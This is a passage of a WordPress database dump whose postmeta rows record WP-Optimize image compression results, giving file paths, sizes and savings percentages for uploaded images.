WP-Optimize'),(164072,125663,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:99111;s:12:\"smushed-size\";i:48805;s:15:\"savings-percent\";d:50.75999999999999801048033987171947956085205078125;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:99111;s:10:\"compressed\";i:48805;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9983;s:10:\"compressed\";i:9301;}s:6:\"medium\";a:2:{s:8:\"original\";i:22933;s:10:\"compressed\";i:21256;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:35685;s:10:\"compressed\";i:33214;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2041;s:10:\"compressed\";i:1615;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:29592;s:10:\"compressed\";i:27473;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:16911;s:10:\"compressed\";i:15710;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:58254;s:10:\"compressed\";i:54678;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:15635;s:10:\"compressed\";i:14581;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:35263;s:10:\"compressed\";i:32945;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:12579;s:10:\"compressed\";i:11654;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:34491;s:10:\"compressed\";i:32213;}}}'),(164073,125664,'original-file','2019/08/ECK_Temple_CO_015-lg-o-updraft-pre-smush-original.jpg'),(164074,125664,'smush-complete','1'),(164075,125664,'smush-info','The file was compressed from 51.94 KB to 51.15 KB saving 1.52 percent using WP-Optimize'),(164076,125664,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:53189;s:12:\"smushed-size\";i:52379;s:15:\"savings-percent\";d:1.520000000000000017763568394002504646778106689453125;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:53189;s:10:\"compressed\";i:52379;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9891;s:10:\"compressed\";i:9197;}s:6:\"medium\";a:2:{s:8:\"original\";i:21116;s:10:\"compressed\";i:19412;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:34768;s:10:\"compressed\";i:32271;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2151;s:10:\"compressed\";i:1726;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:26211;s:10:\"compressed\";i:24514;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:16351;s:10:\"compressed\";i:14961;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:49658;s:10:\"compressed\";i:46647;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:19855;s:10:\"compressed\";i:18228;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:39834;s:10:\"compressed\";i:37270;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:13632;s:10:\"compressed\";i:12453;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:32397;s:10:\"compressed\";i:30202;}}}'),(164077,125665,'original-file','2019/08/ECK_Temple_CO_016-lg-updraft-pre-smush-original.jpg'),(164078,125665,'smush-complete','1'),(164079,125665,'smush-info','The file was compressed from 50.14 KB to 47.84 KB saving 4.59 percent using WP-Optimize'),(164080,125665,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:51345;s:12:\"smushed-size\";i:48990;s:15:\"savings-percent\";d:4.589999999999999857891452847979962825775146484375;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:51345;s:10:\"compressed\";i:48990;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9029;s:10:\"compressed\";i:8431;}s:6:\"medium\";a:2:{s:8:\"original\";i:23354;s:10:\"compressed\";i:21664;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:33360;s:10:\"compressed\";i:31373;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2066;s:10:\"compressed\";i:1642;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:25699;s:10:\"compressed\";i:24292;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:17558;s:10:\"compressed\";i:16260;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:57534;s:10:\"compressed\";i:54620;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:16143;s:10:\"compressed\";i:14958;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:35334;s:10:\"compressed\";i:33229;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:13074;s:10:\"compressed\";i:12059;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:33978;s:10:\"compressed\";i:31863;}}}'),(164081,125666,'original-file','2019/08/ECK_Temple_CO_017-lg-updraft-pre-smush-original.jpg'),(164082,125666,'smush-complete','1'),(164083,125666,'smush-info','The file was compressed from 78.69 KB to 71.54 KB saving 9.09 percent using WP-Optimize'),(164084,125666,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:80574;s:12:\"smushed-size\";i:73253;s:15:\"savings-percent\";d:9.089999999999999857891452847979962825775146484375;s:10:\"sizes-info\";a:14:{s:4:\"full\";a:2:{s:8:\"original\";i:80574;s:10:\"compressed\";i:73253;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10224;s:10:\"compressed\";i:9551;}s:6:\"medium\";a:2:{s:8:\"original\";i:21281;s:10:\"compressed\";i:19576;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:91092;s:10:\"compressed\";i:85615;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:40176;s:10:\"compressed\";i:37274;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2068;s:10:\"compressed\";i:1637;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:29602;s:10:\"compressed\";i:27512;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:16026;s:10:\"compressed\";i:14641;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:55181;s:10:\"compressed\";i:51415;}s:5:\"wcbig\";a:2:{s:8:\"original\";i:97683;s:10:\"compressed\";i:91990;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:23503;s:10:\"compressed\";i:21603;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:52786;s:10:\"compressed\";i:49085;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:14191;s:10:\"compressed\";i:13006;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:37516;s:10:\"compressed\";i:34811;}}}'),(164085,125667,'original-file','2019/08/ECK_Temple_CO_018-lg-updraft-pre-smush-original.jpg'),(164086,125667,'smush-complete','1'),(164087,125667,'smush-info','The file was compressed from 56.30 KB to 45.81 KB saving 18.63 percent using WP-Optimize'),(164088,125667,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:57655;s:12:\"smushed-size\";i:46912;s:15:\"savings-percent\";d:18.629999999999999005240169935859739780426025390625;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:57655;s:10:\"compressed\";i:46912;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9414;s:10:\"compressed\";i:8771;}s:6:\"medium\";a:2:{s:8:\"original\";i:22399;s:10:\"compressed\";i:20856;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:33249;s:10:\"compressed\";i:31115;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2076;s:10:\"compressed\";i:1649;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:27051;s:10:\"compressed\";i:25345;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:17197;s:10:\"compressed\";i:15861;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:57487;s:10:\"compressed\";i:54490;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:15771;s:10:\"compressed\";i:14541;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:34877;s:10:\"compressed\";i:32667;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:12652;s:10:\"compressed\";i:11609;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:33390;s:10:\"compressed\";i:31219;}}}'),(164089,125668,'original-file','2019/08/ECK_Temple_CO_019-lg-updraft-pre-smush-original.jpg'),(164090,125668,'smush-complete','1'),(164091,125668,'smush-info','The file was compressed from 36.11 KB to 26.82 KB saving 25.73 percent using WP-Optimize'),(164092,125668,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:36973;s:12:\"smushed-size\";i:27461;s:15:\"savings-percent\";d:25.730000000000000426325641456060111522674560546875;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:36973;s:10:\"compressed\";i:27461;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8274;s:10:\"compressed\";i:7644;}s:6:\"medium\";a:2:{s:8:\"original\";i:19268;s:10:\"compressed\";i:18219;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:21571;s:10:\"compressed\";i:20337;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1813;s:10:\"compressed\";i:1404;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:23078;s:10:\"compressed\";i:21918;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:22989;s:10:\"compressed\";i:21719;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:8656;s:10:\"compressed\";i:8082;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:9777;s:10:\"compressed\";i:9106;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:24090;s:10:\"compressed\";i:22415;}}}'),(164093,125669,'original-file','2019/08/ECK_Temple_CO_020-lg-updraft-pre-smush-original.jpg'),(164094,125669,'smush-complete','1'),(164095,125669,'smush-info','The file was compressed from 75.70 KB to 62.06 KB saving 18.02 percent using WP-Optimize'),(164096,125669,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:77521;s:12:\"smushed-size\";i:63551;s:15:\"savings-percent\";d:18.019999999999999573674358543939888477325439453125;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:77521;s:10:\"compressed\";i:63551;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12159;s:10:\"compressed\";i:11075;}s:6:\"medium\";a:2:{s:8:\"original\";i:29604;s:10:\"compressed\";i:27108;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:44036;s:10:\"compressed\";i:40432;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2234;s:10:\"compressed\";i:1812;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:34531;s:10:\"compressed\";i:31926;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:22428;s:10:\"compressed\";i:20478;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:73360;s:10:\"compressed\";i:68321;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:20826;s:10:\"compressed\";i:19000;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:45727;s:10:\"compressed\";i:42150;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:16577;s:10:\"compressed\";i:15131;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:43804;s:10:\"compressed\";i:40317;}}}'),(164097,125670,'original-file','2019/08/ECK_Temple_CO_021-lg-updraft-pre-smush-original.jpg'),(164098,125670,'smush-complete','1'),(164099,125670,'smush-info','The file was compressed from 76.67 KB to 63.85 KB saving 16.72 percent using WP-Optimize'),(164100,125670,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:78515;s:12:\"smushed-size\";i:65385;s:15:\"savings-percent\";d:16.719999999999998863131622783839702606201171875;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:78515;s:10:\"compressed\";i:65385;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11933;s:10:\"compressed\";i:10863;}s:6:\"medium\";a:2:{s:8:\"original\";i:29400;s:10:\"compressed\";i:26932;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:44138;s:10:\"compressed\";i:40619;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2371;s:10:\"compressed\";i:1920;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:34159;s:10:\"compressed\";i:31687;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:22081;s:10:\"compressed\";i:20193;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:73468;s:10:\"compressed\";i:68538;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:20680;s:10:\"compressed\";i:18913;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:45071;s:10:\"compressed\";i:41713;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:16586;s:10:\"compressed\";i:15058;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:43592;s:10:\"compressed\";i:40227;}}}'),(164101,125671,'original-file','2019/08/ECK_Temple_CO_023-A-lg-updraft-pre-smush-original.jpg'),(164102,125671,'smush-complete','1'),(164103,125671,'smush-info','The file was compressed from 80.79 KB to 66.41 KB saving 17.8 percent using WP-Optimize'),(164104,125671,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:82727;s:12:\"smushed-size\";i:67999;s:15:\"savings-percent\";d:17.800000000000000710542735760100185871124267578125;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:82727;s:10:\"compressed\";i:67999;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12262;s:10:\"compressed\";i:11102;}s:6:\"medium\";a:2:{s:8:\"original\";i:31187;s:10:\"compressed\";i:28420;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:45973;s:10:\"compressed\";i:42121;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2280;s:10:\"compressed\";i:1843;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:35780;s:10:\"compressed\";i:32827;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:23608;s:10:\"compressed\";i:21374;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:78379;s:10:\"compressed\";i:72641;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:21665;s:10:\"compressed\";i:19622;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:47944;s:10:\"compressed\";i:44063;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:17363;s:10:\"compressed\";i:15706;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:46297;s:10:\"compressed\";i:42408;}}}'),(164105,125672,'original-file','2019/08/ECK_Temple_CO_023-lg-updraft-pre-smush-original.jpg'),(164106,125672,'smush-complete','1'),(164107,125672,'smush-info','The file was compressed from 59.71 KB to 57.05 KB saving 4.45 percent using WP-Optimize'),(164108,125672,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:61141;s:12:\"smushed-size\";i:58421;s:15:\"savings-percent\";d:4.45000000000000017763568394002504646778106689453125;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:61141;s:10:\"compressed\";i:58421;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11960;s:10:\"compressed\";i:10802;}s:6:\"medium\";a:2:{s:8:\"original\";i:28124;s:10:\"compressed\";i:25651;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:39602;s:10:\"compressed\";i:36539;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2401;s:10:\"compressed\";i:1944;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:32791;s:10:\"compressed\";i:30162;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:21705;s:10:\"compressed\";i:19721;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:67381;s:10:\"compressed\";i:62783;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:19945;s:10:\"compressed\";i:18121;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:42321;s:10:\"compressed\";i:39040;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:15953;s:10:\"compressed\";i:14404;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:40641;s:10:\"compressed\";i:37327;}}}'),(164109,125673,'original-file','2019/08/ECK_Temple_CO_025-lg-updraft-pre-smush-original.jpg'),(164110,125673,'smush-complete','1'),(164111,125673,'smush-info','The file was compressed from 79.99 KB to 58.02 KB saving 27.46 percent using WP-Optimize'),(164112,125673,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:81908;s:12:\"smushed-size\";i:59417;s:15:\"savings-percent\";d:27.46000000000000085265128291212022304534912109375;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:81908;s:10:\"compressed\";i:59417;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8134;s:10:\"compressed\";i:7545;}s:6:\"medium\";a:2:{s:8:\"original\";i:21342;s:10:\"compressed\";i:19809;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:34361;s:10:\"compressed\";i:32120;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:1897;s:10:\"compressed\";i:1490;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:23202;s:10:\"compressed\";i:21942;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:16219;s:10:\"compressed\";i:14926;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:55720;s:10:\"compressed\";i:52431;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:18352;s:10:\"compressed\";i:16995;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:41097;s:10:\"compressed\";i:38445;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:12724;s:10:\"compressed\";i:11750;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:34168;s:10:\"compressed\";i:32034;}}}'),(164113,125674,'original-file','2019/08/ECK_Temple_CO_026-lg-updraft-pre-smush-original.jpg'),(164114,125674,'smush-complete','1'),(164115,125674,'smush-info','The file was compressed from 130.57 KB to 104.94 KB saving 19.63 percent using WP-Optimize'),(164116,125674,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:133700;s:12:\"smushed-size\";i:107460;s:15:\"savings-percent\";d:19.629999999999999005240169935859739780426025390625;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:133700;s:10:\"compressed\";i:107460;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:16571;s:10:\"compressed\";i:14801;}s:6:\"medium\";a:2:{s:8:\"original\";i:47117;s:10:\"compressed\";i:41979;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:72651;s:10:\"compressed\";i:64293;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2540;s:10:\"compressed\";i:2074;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:55486;s:10:\"compressed\";i:49468;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:34535;s:10:\"compressed\";i:30795;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:132061;s:10:\"compressed\";i:118191;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:27274;s:10:\"compressed\";i:24322;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:66278;s:10:\"compressed\";i:59157;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:23573;s:10:\"compressed\";i:20920;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:71037;s:10:\"compressed\";i:62998;}}}'),(164117,125675,'original-file','2019/08/ECK_Temple_CO_027-lg-updraft-pre-smush-original.jpg'),(164118,125675,'smush-complete','1'),(164119,125675,'smush-info','The file was compressed from 115.87 KB to 95.78 KB saving 17.33 percent using WP-Optimize'),(164120,125675,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:118648;s:12:\"smushed-size\";i:98081;s:15:\"savings-percent\";d:17.3299999999999982946974341757595539093017578125;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:118648;s:10:\"compressed\";i:98081;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:15157;s:10:\"compressed\";i:13644;}s:6:\"medium\";a:2:{s:8:\"original\";i:39829;s:10:\"compressed\";i:35894;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:61455;s:10:\"compressed\";i:55105;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2355;s:10:\"compressed\";i:1927;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:49946;s:10:\"compressed\";i:44873;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:29045;s:10:\"compressed\";i:26116;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:109986;s:10:\"compressed\";i:99573;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:26572;s:10:\"compressed\";i:23911;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:64530;s:10:\"compressed\";i:58116;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:20745;s:10:\"compressed\";i:18601;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:61759;s:10:\"compressed\";i:55521;}}}'),(164121,125676,'original-file','2019/08/ECK_Temple_CO_029-lg-updraft-pre-smush-original.jpg'),(164122,125676,'smush-complete','1'),(164123,125676,'smush-info','The file was compressed from 103.69 KB to 78.65 KB saving 24.15 percent using WP-Optimize'),(164124,125676,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:106177;s:12:\"smushed-size\";i:80533;s:15:\"savings-percent\";d:24.14999999999999857891452847979962825775146484375;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:106177;s:10:\"compressed\";i:80533;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11262;s:10:\"compressed\";i:10387;}s:6:\"medium\";a:2:{s:8:\"original\";i:26200;s:10:\"compressed\";i:24228;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:48643;s:10:\"compressed\";i:44901;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2051;s:10:\"compressed\";i:1638;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:37253;s:10:\"compressed\";i:34551;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:19269;s:10:\"compressed\";i:17749;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:74846;s:10:\"compressed\";i:69608;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:22092;s:10:\"compressed\";i:20402;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:54007;s:10:\"compressed\";i:50116;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:15055;s:10:\"compressed\";i:13896;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:45419;s:10:\"compressed\";i:42069;}}}'),(164125,125677,'original-file','2019/08/ECK_Temple_CO_030-lg-updraft-pre-smush-original.jpg'),(164126,125677,'smush-complete','1'),(164127,125677,'smush-info','The file was compressed from 145.20 KB to 112.39 KB saving 22.59 percent using WP-Optimize'),(164128,125677,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:148686;s:12:\"smushed-size\";i:115092;s:15:\"savings-percent\";d:22.589999999999999857891452847979962825775146484375;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:148686;s:10:\"compressed\";i:115092;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:14255;s:10:\"compressed\";i:12883;}s:6:\"medium\";a:2:{s:8:\"original\";i:35132;s:10:\"compressed\";i:31711;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:63072;s:10:\"compressed\";i:57052;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2337;s:10:\"compressed\";i:1894;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:48659;s:10:\"compressed\";i:44097;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:25612;s:10:\"compressed\";i:23186;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:102711;s:10:\"compressed\";i:92853;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:29286;s:10:\"compressed\";i:26502;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:73172;s:10:\"compressed\";i:66199;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:19820;s:10:\"compressed\";i:17999;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:61565;s:10:\"compressed\";i:55675;}}}'),(164129,126870,'original-file','2019/08/404-page-pup-sorry-updraft-pre-smush-original.jpg'),(164130,126870,'smush-complete','1'),(164131,126870,'smush-info','The file was compressed from 72.95 KB to 69.71 KB saving 4.44 percent using WP-Optimize'),(164132,126870,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:74698;s:12:\"smushed-size\";i:71382;s:15:\"savings-percent\";d:4.44000000000000039079850466805510222911834716796875;s:10:\"sizes-info\";a:13:{s:4:\"full\";a:2:{s:8:\"original\";i:74698;s:10:\"compressed\";i:71382;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:14211;s:10:\"compressed\";i:12583;}s:6:\"medium\";a:2:{s:8:\"original\";i:23536;s:10:\"compressed\";i:21061;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:97926;s:10:\"compressed\";i:89767;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:41284;s:10:\"compressed\";i:37370;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2648;s:10:\"compressed\";i:2149;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:40719;s:10:\"compressed\";i:36794;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:17813;s:10:\"compressed\";i:15965;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:59569;s:10:\"compressed\";i:54037;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:22710;s:10:\"compressed\";i:20347;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:49682;s:10:\"compressed\";i:45182;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:16426;s:10:\"compressed\";i:14646;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:43101;s:10:\"compressed\";i:39008;}}}'),(164133,148629,'original-file','2019/09/Fubbi-Quantz-2-updraft-pre-smush-original.jpg'),(164134,148629,'smush-complete','1'),(164135,148629,'smush-info','The file was compressed from 20.04 KB to 18.07 KB saving 9.85 percent using WP-Optimize'),(164136,148629,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:20524;s:12:\"smushed-size\";i:18503;s:15:\"savings-percent\";d:9.8499999999999996447286321199499070644378662109375;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:20524;s:10:\"compressed\";i:18503;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8688;s:10:\"compressed\";i:8069;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2028;s:10:\"compressed\";i:1611;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:9046;s:10:\"compressed\";i:8433;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:9651;s:10:\"compressed\";i:9003;}}}'),(164137,148678,'original-file','2019/09/Gopal-Das-updraft-pre-smush-original.jpg'),(164138,148678,'smush-complete','1'),(164139,148678,'smush-info','The file was compressed from 21.90 KB to 19.55 KB saving 10.75 percent using WP-Optimize'),(164140,148678,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:22429;s:12:\"smushed-size\";i:20019;s:15:\"savings-percent\";d:10.75;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:22429;s:10:\"compressed\";i:20019;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9679;s:10:\"compressed\";i:8969;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2170;s:10:\"compressed\";i:1747;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:9709;s:10:\"compressed\";i:9032;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:10865;s:10:\"compressed\";i:9911;}}}'),(164141,148679,'original-file','2019/09/Kata-Daki-updraft-pre-smush-original.jpg'),(164142,148679,'smush-complete','1'),(164143,148679,'smush-info','The file was compressed from 21.09 KB to 19.05 KB saving 9.66 percent using 